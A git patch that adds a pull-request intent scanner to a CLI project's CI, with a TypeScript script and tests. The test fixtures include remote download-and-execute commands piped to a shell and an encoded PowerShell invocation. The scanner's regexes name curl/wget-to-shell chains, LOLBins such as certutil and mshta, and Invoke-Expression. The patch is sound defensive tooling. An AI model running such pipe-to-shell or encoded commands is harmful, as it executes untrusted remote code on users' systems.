From 7350a798cb129900de133eca07fbc2a1a02d3253 Mon Sep 17 00:00:00 2001 From: Kevin Codex Date: Sun, 5 Apr 2026 17:05:24 +0800 Subject: [PATCH] Feature/pr intent scan hardening (#375) * security: harden suspicious PR intent scanner * security: reduce pr scanner false positives --- .github/workflows/pr-checks.yml | 4 + README.md | 2 +- package.json | 1 + scripts/pr-intent-scan.test.ts | 136 ++++++++++ scripts/pr-intent-scan.ts | 453 ++++++++++++++++++++++++++++++++ 5 files changed, 595 insertions(+), 1 deletion(-) create mode 100644 scripts/pr-intent-scan.test.ts create mode 100644 scripts/pr-intent-scan.ts diff --git a/.github/workflows/pr-checks.yml b/.github/workflows/pr-checks.yml index f05311a1..2859e00a 100644 --- a/.github/workflows/pr-checks.yml +++ b/.github/workflows/pr-checks.yml @@ -16,6 +16,8 @@ jobs: steps: - name: Check out repository uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + with: + fetch-depth: 0 - name: Set up Node.js uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0 @@ -36,6 +38,8 @@ jobs: - name: Full unit test suite run: bun test --max-concurrency=1 + - name: Suspicious PR intent scan + run: bun run security:pr-scan -- --base ${{ github.event.pull_request.base.sha || 'origin/main' }} - name: Provider tests run: bun run test:provider diff --git a/README.md b/README.md index 8edea3d6..de7288b5 100644 --- a/README.md +++ b/README.md @@ -198,6 +198,7 @@ Helpful commands: - `bun run dev` - `bun test` - `bun run test:coverage` +- `bun run security:pr-scan -- --base origin/main` - `bun run smoke` - `bun run doctor:runtime` - `bun run verify:privacy` @@ -245,7 +246,6 @@ Recommended contributor validation before opening a PR: - focused `bun test ...` runs for the files and flows you changed Coverage output is written to `coverage/lcov.info`, and OpenClaude also generates a git-activity-style heatmap at `coverage/index.html`. - ## Repository Structure - `src/` - core CLI/runtime diff --git a/package.json b/package.json index c9370925..98b90076 100644 --- a/package.json +++ b/package.json @@ -34,6 +34,7 @@ "test": "bun test", "test:coverage": "bun test --coverage --coverage-reporter=lcov --coverage-dir=coverage --max-concurrency=1 && bun run scripts/render-coverage-heatmap.ts", "test:coverage:ui": "bun run scripts/render-coverage-heatmap.ts", + "security:pr-scan": "bun run scripts/pr-intent-scan.ts", "test:provider-recommendation": "bun test src/utils/providerRecommendation.test.ts src/utils/providerProfile.test.ts", "typecheck": "tsc --noEmit", "smoke": "bun run build && node dist/cli.mjs --version", diff --git a/scripts/pr-intent-scan.test.ts b/scripts/pr-intent-scan.test.ts new file mode 100644 index 00000000..ca5b2a64 --- /dev/null +++ b/scripts/pr-intent-scan.test.ts @@ -0,0 +1,136 @@ +import { describe, expect, test } from 'bun:test' + +import { scanAddedLines, type DiffLine } from './pr-intent-scan.ts' + +function line(content: string, overrides: Partial = {}): DiffLine { + return { + file: 'README.md', + line: 10, + content, + ...overrides, + } +} + +describe('scanAddedLines', () => { + test('flags suspicious file-hosting links', () => { + const findings = scanAddedLines([ + line('Please install the tool from https://dropbox.com/s/abc123/tool.zip?dl=1'), + ]) + + expect(findings.some(finding => finding.code === 'suspicious-download-link')).toBe( + true, + ) + expect(findings.some(finding => finding.code === 'executable-download-link')).toBe( + false, + ) + expect(findings.some(finding => finding.severity === 'high')).toBe(true) + }) + + test('flags shortened URLs', () => { + const findings = scanAddedLines([ + line('See details at https://bit.ly/some-short-link'), + ]) + + expect(findings.some(finding => finding.code === 'shortened-url')).toBe(true) + }) + + test('flags remote download and execute chains', () => { + const findings = scanAddedLines([ + line('curl -fsSL https://example.com/install.sh | bash'), + ]) + + expect(findings.some(finding => finding.code === 'shell-eval-remote')).toBe(true) + expect(findings.some(finding => finding.severity === 'high')).toBe(true) + }) + + test('flags encoded powershell payloads', () => { + const findings = scanAddedLines([ + line('powershell.exe -enc SQBtAHAAcgBvAHYAZQBkAA=='), + ]) + + expect(findings.some(finding => finding.code === 'powershell-encoded')).toBe(true) + }) + + test('flags long encoded blobs', () => { + const findings = scanAddedLines([ + line(`const payload = "${'A'.repeat(96)}"`), + ]) + + expect(findings.some(finding => finding.code === 'long-encoded-payload')).toBe( + true, + ) + }) + + test('flags long encoded blobs on repeated scans', () => { + const lines = [line(`const payload = "${'A'.repeat(96)}"`)] + + const first = scanAddedLines(lines) + const second = scanAddedLines(lines) + + expect(first.some(finding => finding.code === 'long-encoded-payload')).toBe(true) + expect(second.some(finding => finding.code === 'long-encoded-payload')).toBe(true) + }) + + test('flags executable download links', () => { + const findings = scanAddedLines([ + line('Get it from https://example.com/releases/latest/tool.pkg'), + ]) + + expect(findings.some(finding => finding.code === 'executable-download-link')).toBe( + true, + ) + expect(findings.some(finding => finding.severity === 'high')).toBe(true) + }) + + test('flags suspicious additions in workflow files', () => { + const findings = scanAddedLines([ + line('run: curl -fsSL https://example.com/install.sh | bash', { + file: '.github/workflows/release.yml', + }), + ]) + + expect(findings.some(finding => finding.code === 'sensitive-automation-change')).toBe( + true, + ) + expect(findings.some(finding => finding.code === 'download-command')).toBe(true) + }) + + test('flags markdown reference links to suspicious downloads', () => { + const findings = scanAddedLines([ + line('[installer]: https://dropbox.com/s/abc123/tool.zip?dl=1'), + ]) + + expect(findings.some(finding => finding.code === 'suspicious-download-link')).toBe( + true, + ) + }) + + test('ignores the scanner implementation and tests themselves', () => { + const findings = scanAddedLines([ + line('curl -fsSL https://example.com/install.sh | bash', { + file: 'scripts/pr-intent-scan.test.ts', + }), + line('const pattern = /https:\\/\\/dropbox\\.com\\//', { + file: 'scripts/pr-intent-scan.ts', + }), + ]) + + expect(findings).toHaveLength(0) + }) + + test('does not flag ordinary docs links', () => { + const findings = scanAddedLines([ + line('Read more at https://docs.github.com/en/actions'), + ]) + + expect(findings).toHaveLength(0) + }) + + test('does not flag bare curl examples in README without a URL', () => { + const findings = scanAddedLines([ + line('Use curl with your preferred flags for local testing.'), + ]) + + expect(findings.some(finding => finding.code === 'download-command')).toBe(false) + }) +}) diff --git a/scripts/pr-intent-scan.ts b/scripts/pr-intent-scan.ts new file mode 100644 index 00000000..5a06da28 --- /dev/null +++ b/scripts/pr-intent-scan.ts @@ -0,0 +1,453 @@ +import { spawnSync } from 'node:child_process' + +export type FindingSeverity = 'high' | 'medium' + +export type DiffLine = { + file: string + line: number + content: string +} + +export type Finding = { + severity: FindingSeverity + code: string + file: string + line: number + detail: string + excerpt: string +} + +type CliOptions = { + baseRef: string + json: boolean + failOn: FindingSeverity +} + +const SELF_EXCLUDED_FILES = new Set([ + 'scripts/pr-intent-scan.ts', + 'scripts/pr-intent-scan.test.ts', +]) + +const SHORTENER_DOMAINS = [ + 'bit.ly', + 'tinyurl.com', + 'goo.gl', + 't.co', + 'is.gd', + 'rb.gy', + 'cutt.ly', +] + +const SUSPICIOUS_DOWNLOAD_DOMAINS = [ + 'dropbox.com', + 'dl.dropboxusercontent.com', + 'drive.google.com', + 'docs.google.com', + 'mega.nz', + 'mediafire.com', + 'transfer.sh', + 'anonfiles.com', + 'catbox.moe', +] + +const URL_REGEX = /\bhttps?:\/\/[^\s)>"']+/gi +const LONG_BASE64_REGEX = /\b(?:[A-Za-z0-9+/]{80,}={0,2}|[A-Za-z0-9_-]{80,})\b/ +const EXECUTABLE_PATH_REGEX = + /\.(?:sh|bash|zsh|ps1|exe|msi|pkg|deb|rpm|zip|tar|tgz|gz|xz|dmg|appimage)(?:$|[?#])/i +const SENSITIVE_PATH_REGEX = + /^(?:\.github\/workflows\/|scripts\/|bin\/|install(?:\/|\.|$)|.*(?:Dockerfile|docker-compose|compose\.ya?ml)$)/i + +function parseOptions(argv: string[]): CliOptions { + const options: CliOptions = { + baseRef: 'origin/main', + json: false, + failOn: 'high', + } + + for (let index = 0; index < argv.length; index++) { + const arg = argv[index] + if (arg === '--json') { + options.json = true + continue + } + if (arg === '--base') { + const next = argv[index + 1] + if (next && !next.startsWith('--')) { + options.baseRef = next + index++ + } + continue + } + if (arg === '--fail-on') { + const next = argv[index + 1] + if (next === 'high' || next === 'medium') { + options.failOn = next + index++ + } + } + } + + return options +} + +function trimExcerpt(content: string): string { + const compact = content.trim().replace(/\s+/g, ' ') + return compact.length > 140 ? `${compact.slice(0, 137)}...` : compact +} + +function uniqueFindings(findings: Finding[]): Finding[] { + const seen = new Set() + return findings.filter(finding => { + const key = `${finding.code}:${finding.file}:${finding.line}:${finding.detail}` + if (seen.has(key)) { + return false + } + seen.add(key) + return true + }) +} + +function parseAddedLines(diffText: string): DiffLine[] { + const lines = diffText.split('\n') + const added: DiffLine[] = [] + let currentFile: string | null = null + let currentLine = 0 + + for (const rawLine of lines) { + if (rawLine.startsWith('+++ b/')) { + currentFile = rawLine.slice('+++ b/'.length) + continue + } + + if (rawLine.startsWith('@@')) { + const match = /\+(\d+)(?:,(\d+))?/.exec(rawLine) + if (match) { + currentLine = Number(match[1]) + } + continue + } + + if (!currentFile) { + continue + } + + if (rawLine.startsWith('+') && !rawLine.startsWith('+++')) { + added.push({ + file: currentFile, + line: currentLine, + content: rawLine.slice(1), + }) + currentLine += 1 + continue + } + + if (rawLine.startsWith('-') && !rawLine.startsWith('---')) { + continue + } + + if (!rawLine.startsWith('\\')) { + currentLine += 1 + } + } + + return added +} + +function tryParseUrl(value: string): URL | null { + try { + return new URL(value) + } catch { + return null + } +} + +function hostMatches(hostname: string, domain: string): boolean { + return hostname === domain || hostname.endsWith(`.${domain}`) +} + +function hasSuspiciousDownloadIndicators(url: URL): boolean { + const combined = `${url.pathname}${url.search}`.toLowerCase() + return ( + combined.includes('dl=1') || + combined.includes('raw=1') || + combined.includes('export=download') || + combined.includes('/download') || + combined.includes('/uc?export=download') + ) +} + +function findUrlFindings(line: DiffLine): Finding[] { + const findings: Finding[] = [] + const matches = line.content.match(URL_REGEX) ?? [] + + for (const match of matches) { + const parsed = tryParseUrl(match) + if (!parsed) continue + + const hostname = parsed.hostname.toLowerCase() + + for (const domain of SHORTENER_DOMAINS) { + if (hostMatches(hostname, domain)) { + findings.push({ + severity: 'medium', + code: 'shortened-url', + file: line.file, + line: line.line, + detail: `Added shortened URL: ${hostname}`, + excerpt: trimExcerpt(line.content), + }) + } + } + + const isSuspiciousHost = SUSPICIOUS_DOWNLOAD_DOMAINS.some(domain => + hostMatches(hostname, domain), + ) + const isExecutableDownload = EXECUTABLE_PATH_REGEX.test( + `${parsed.pathname}${parsed.search}`, + ) + + if (isSuspiciousHost) { + findings.push({ + severity: + hasSuspiciousDownloadIndicators(parsed) || isExecutableDownload + ? 'high' + : 'medium', + code: 'suspicious-download-link', + file: line.file, + line: line.line, + detail: `Added external file-hosting link: ${hostname}`, + excerpt: trimExcerpt(line.content), + }) + } else if (isExecutableDownload) { + findings.push({ + severity: 'high', + code: 'executable-download-link', + file: line.file, + line: line.line, + detail: `Added direct link to executable or archive payload: ${hostname}`, + excerpt: trimExcerpt(line.content), + }) + } + } + + return findings +} + +function findSensitivePathFindings(line: DiffLine): Finding[] { + if (!SENSITIVE_PATH_REGEX.test(line.file)) { + return [] + } + + const lower = line.content.toLowerCase() + + if ( + /\b(curl|wget|invoke-webrequest|iwr|powershell|bash|sh|chmod\s+\+x)\b/i.test( + line.content, + ) || + URL_REGEX.test(line.content) || + lower.includes('download') + ) { + return [ + { + severity: 'medium', + code: 'sensitive-automation-change', + file: line.file, + line: line.line, + detail: + 'Added network, execution, or download-related content in a sensitive automation file', + excerpt: trimExcerpt(line.content), + }, + ] + } + + return [] +} + +function findCommandFindings(line: DiffLine): Finding[] { + const findings: Finding[] = [] + const lower = line.content.toLowerCase() + + const highPatterns: Array<[string, RegExp, string]> = [ + [ + 'download-exec-chain', + /\b(curl|wget|invoke-webrequest|iwr)\b.*(\|\s*(sh|bash|zsh)|;\s*chmod\s+\+x|&&\s*\.\.?\/|>\s*\/tmp\/)/i, + 'Added remote download followed by execution or staging', + ], + [ + 'powershell-encoded', + /\bpowershell(?:\.exe)?\b.*(?:-enc|-encodedcommand)\b/i, + 'Added encoded PowerShell invocation', + ], + [ + 'shell-eval-remote', + /\b(curl|wget)\b.*\|\s*(sh|bash|zsh)\b/i, + 'Added shell pipe from remote content into interpreter', + ], + [ + 'binary-lolbin', + /\b(mshta|rundll32|regsvr32|certutil)\b/i, + 'Added living-off-the-land binary often used for payload staging', + ], + [ + 'invoke-expression', + /\b(iex|invoke-expression)\b/i, + 'Added PowerShell expression execution', + ], + ] + + const mediumPatterns: Array<[string, RegExp, string]> = [ + [ + 'download-command', + /\b(curl|wget|invoke-webrequest|iwr)\b.*https?:\/\//i, + 'Added command that downloads remote content', + ], + [ + 'archive-extract-exec', + /\b(unzip|tar|7z)\b.*(&&|;).*\b(chmod|node|python|bash|sh)\b/i, + 'Added archive extraction followed by execution', + ], + [ + 'base64-decode', + /\b(base64\s+-d|openssl\s+base64\s+-d|python .*b64decode)\b/i, + 'Added explicit payload decode step', + ], + ] + + for (const [code, pattern, detail] of highPatterns) { + if (pattern.test(line.content)) { + findings.push({ + severity: 'high', + code, + file: line.file, + line: line.line, + detail, + excerpt: trimExcerpt(line.content), + }) + } + } + + for (const [code, pattern, detail] of mediumPatterns) { + if (code === 'download-command' && !SENSITIVE_PATH_REGEX.test(line.file)) { + continue + } + if (pattern.test(line.content)) { + findings.push({ + severity: 'medium', + code, + file: line.file, + line: line.line, + detail, + excerpt: trimExcerpt(line.content), + }) + } + } + + if (LONG_BASE64_REGEX.test(line.content) && !lower.includes('sha256') && !lower.includes('sha512')) { + findings.push({ + severity: 'medium', + code: 'long-encoded-payload', + file: line.file, + line: line.line, + detail: 'Added long encoded blob or token-like payload', + excerpt: trimExcerpt(line.content), + }) + } + + return findings +} + +export function scanAddedLines(lines: DiffLine[]): Finding[] { + const findings = lines + .filter(line => !SELF_EXCLUDED_FILES.has(line.file)) + .flatMap(line => [ + ...findUrlFindings(line), + ...findCommandFindings(line), + ...findSensitivePathFindings(line), + ]) + return uniqueFindings(findings) +} + +export function getGitDiff(baseRef: string): string { + const mergeBase = spawnSync('git', ['merge-base', baseRef, 'HEAD'], { + encoding: 'utf8', + }) + + if (mergeBase.status !== 0) { + throw new Error( + `Could not determine merge-base with ${baseRef}: ${mergeBase.stderr.trim() || mergeBase.stdout.trim()}`, + ) + } + + const base = mergeBase.stdout.trim() + const diff = spawnSync( + 'git', + ['diff', '--unified=0', '--no-ext-diff', `${base}...HEAD`], + { encoding: 'utf8' }, + ) + + if (diff.status !== 0) { + throw new Error(`git diff failed: ${diff.stderr.trim() || diff.stdout.trim()}`) + } + + return diff.stdout +} + +function shouldFail(findings: Finding[], failOn: FindingSeverity): boolean { + if (failOn === 'medium') { + return findings.length > 0 + } + return findings.some(finding => finding.severity === 'high') +} + +function renderText(findings: Finding[]): string { + if (findings.length === 0) { + return 'PR intent scan: no suspicious additions found.' + } + + const high = findings.filter(f => f.severity === 'high') + const medium = findings.filter(f => f.severity === 'medium') + const lines = [ + `PR intent scan: ${findings.length} finding(s)`, + `- high: ${high.length}`, + `- medium: ${medium.length}`, + '', + ] + + for (const finding of findings) { + lines.push( + `[${finding.severity.toUpperCase()}] ${finding.file}:${finding.line} ${finding.detail}`, + ) + lines.push(` ${finding.excerpt}`) + } + + return lines.join('\n') +} + +export function run(options: CliOptions): number { + const diff = getGitDiff(options.baseRef) + const addedLines = parseAddedLines(diff) + const findings = scanAddedLines(addedLines) + + if (options.json) { + process.stdout.write( + `${JSON.stringify( + { + baseRef: options.baseRef, + addedLines: addedLines.length, + findings, + }, + null, + 2, + )}\n`, + ) + } else { + process.stdout.write(`${renderText(findings)}\n`) + } + + return shouldFail(findings, options.failOn) ? 1 : 0 +} + +if (import.meta.main) { + const options = parseOptions(process.argv.slice(2)) + process.exitCode = run(options) +}